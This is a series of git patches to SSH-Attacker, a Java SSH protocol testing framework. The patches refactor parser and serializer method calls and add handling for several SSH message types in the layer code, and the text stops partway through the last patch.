a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java index e944bf4f5..d360a29fd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParser.java @@ -75,6 +75,6 @@ protected void parseMessageSpecificContents(DhKeyExchangeReplyMessage message) { @Override public void parse(DhKeyExchangeReplyMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java index f20707521..040a98391 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParser.java @@ -84,6 +84,6 @@ protected void parseMessageSpecificContents(DisconnectMessage message) { @Override public void parse(DisconnectMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java index fed88d8c2..841704dc3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java @@ -56,6 +56,6 @@ public void parseMessageSpecificContents(EcdhKeyExchangeInitMessage message) { @Override public void parse(EcdhKeyExchangeInitMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java index 979723ba1..4574642e6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParser.java @@ -79,6 +79,6 @@ public void parseMessageSpecificContents(EcdhKeyExchangeReplyMessage message) { @Override public void parse(EcdhKeyExchangeReplyMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java index 3b5183efc..af559ea79 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeReplyMessageParser.java @@ -148,6 +148,6 @@ protected HybridKeyExchangeReplyMessage createMessage() { @Override public void parse(HybridKeyExchangeReplyMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java index e30c3c39a..10db5d212 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParser.java @@ -52,6 +52,6 @@ protected void parseMessageSpecificContents(IgnoreMessage message) { @Override public void parse(IgnoreMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java index 87fa3b0ae..80f6c9979 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java @@ -33,7 +33,7 @@ public RsaKeyExchangeDoneMessageParser(InputStream stream) { @Override public void parse(RsaKeyExchangeDoneMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java index d2b195a8f..8f96c1050 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParser.java @@ -34,7 +34,7 @@ public RsaKeyExchangePubkeyMessageParser(InputStream stream) { @Override public void parse(RsaKeyExchangePubkeyMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java index e9d33d3c7..8b67284af 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeSecretMessageParser.java @@ -35,7 +35,7 @@ public RsaKeyExchangeSecretMessageParser(InputStream stream) { @Override public void parse(RsaKeyExchangeSecretMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java index 90805d8bb..b8293fea5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParser.java @@ -51,6 +51,6 @@ protected void parseMessageSpecificContents(UnimplementedMessage message) { @Override public void parse(UnimplementedMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java index 0828e10c6..9781a8101 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnknownMessageParser.java @@ -48,6 +48,6 @@ protected void parseMessageSpecificContents(UnknownMessage message) { @Override public void parse(UnknownMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java index 7e96a686d..ccc9e95b1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java @@ -57,7 +57,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java index 46d842a97..3233a11e1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java @@ -54,7 +54,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java index 3b26b25f4..2deb2fef3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java @@ -41,7 +41,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java index 088c84c89..182ba4e14 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java @@ -34,7 +34,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java index 1e88bc1ed..181039ff0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java @@ -61,7 +61,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java index 8c1fe6944..0ae6185c0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java @@ -46,7 +46,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java index a70d1f422..0f56e6573 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java @@ -41,7 +41,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java index aee911344..fbe4d18ba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java @@ -61,7 +61,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java index 693b18f35..fc3e80fc8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java @@ -60,7 +60,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java index c993a8693..f37d5389d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java @@ -44,7 +44,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java index a841af16d..27564084c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java @@ -59,7 +59,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java index ac9869b14..887c398aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java @@ -62,7 +62,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java index 0b121b7d5..82e06eacc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java @@ -36,7 +36,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java index 97ba2bfff..8becc68c9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java @@ -36,7 +36,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java index e421ab584..5a24cc1cd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java @@ -47,7 +47,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java index d56ea8b63..550468da9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java @@ -40,7 +40,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java index 2d981d65e..dc42e5c3f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java @@ -39,7 +39,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java index e2d13aa58..f57b8d1a9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java @@ -28,7 +28,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java index c8e2c5d92..33b84defe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java @@ -29,7 +29,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } From be8cc3780e0e605477dbb9d464e137a5f920b0b0 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 8 Jul 2023 01:01:45 +0200 Subject: [PATCH 029/176] wip: single handshake is working now --- .../sshattacker/core/layer/impl/SSH2Layer.java | 15 ++++++++++++++- .../nds/sshattacker/core/layer/impl/TcpLayer.java | 6 ++---- .../core/layer/impl/TransportLayer.java | 7 ++++--- 3 files changed, 20 insertions(+), 8 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 7a3d905f8..26589834f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -405,7 +405,10 @@ public void readMessageForHint(PacketLayerHint hint) { readServiceRequestData(); break; case SSH_MSG_HBR_REPLY: - readServiceRequestData(); + readHbrReplProtocolData(); + break; + case SSH_MSG_SERVICE_ACCEPT: + readMsgServiceAccept(); break; default: @@ -419,6 +422,16 @@ private void readServiceRequestData() { readDataContainer(message, context); } + private void readMsgServiceAccept() { + ServiceAcceptMessage message = new ServiceAcceptMessage(); + readDataContainer(message, context); + } + + private void readHbrReplProtocolData() { + HybridKeyExchangeReplyMessage message = new HybridKeyExchangeReplyMessage(); + readDataContainer(message, context); + } + private void readNewKeysProtocolData() { NewKeysMessage message = new NewKeysMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 7a79eda58..16f6574a0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -18,10 +18,8 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; import java.io.IOException; -import java.util.concurrent.TimeUnit; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import org.glassfish.jaxb.core.v2.TODO; /** * The TCP layer is a wrapper around an underlying TCP socket. It forwards the sockets InputStream @@ -69,12 +67,12 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException public HintedInputStream getDataStream() { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); LOGGER.debug("[bro] TCP-Layer is transmitting Datastream now"); - // TODO: remove later, just for debugging + /*// TODO: remove later, just for debugging try { TimeUnit.SECONDS.sleep(1); } catch (InterruptedException e) { throw new RuntimeException(e); - } + }*/ currentInputStream = new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); return currentInputStream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 64d6dcdcf..0738f7f64 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -467,12 +467,12 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); case SSH_MSG_HBR_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); + LOGGER.debug("[bro] returning SSH_MSG_HBR_REPLY Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_REPLY); /* case SSH_MSG_NEWKEYS: LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS);*/ - //SPACER// + // SPACER// case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DISCONNECT); @@ -589,7 +589,8 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_TOKEN); case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); + return new PacketLayerHint( + ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); case SSH_MSG_USERAUTH_GSSAPI_ERROR: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERROR Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERROR); From 1603d5f036748825a64019c30891d6962428dee0 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 8 Jul 2023 01:15:25 +0200 Subject: [PATCH 030/176] wip: adding timeout againt because of stream-errors. Working towards parsing userauth --- .../nds/sshattacker/core/layer/impl/SSH2Layer.java | 11 ++++++++++- .../rub/nds/sshattacker/core/layer/impl/TcpLayer.java | 5 +++-- .../serializer/UserAuthBannerMessageSerializer.java | 2 +- .../serializer/UserAuthFailureMessageSerializer.java | 2 +- .../UserAuthInfoRequestMessageSerializer.java | 2 +- .../UserAuthInfoResponseMessageSerializer.java | 2 +- .../serializer/UserAuthRequestMessageSerializer.java | 2 +- .../serializer/UserAuthSuccessMessageSerializer.java | 2 +- 8 files changed, 19 insertions(+), 9 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 26589834f..c06867815 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -32,6 +32,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; +import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthUnknownMessage; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.*; @@ -410,13 +411,21 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_SERVICE_ACCEPT: readMsgServiceAccept(); break; - + case SSH_MSG_USERAUTH_REQUEST: + readUserAuthReq(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; } } + private void readUserAuthReq() { + // TODO: Rework / Research (original: handleUserAuthRequestMessageParsing) + UserAuthUnknownMessage message = new UserAuthUnknownMessage(); + readDataContainer(message, context); + } + private void readServiceRequestData() { ServiceRequestMessage message = new ServiceRequestMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 16f6574a0..941c76925 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -18,6 +18,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; import java.io.IOException; +import java.util.concurrent.TimeUnit; import 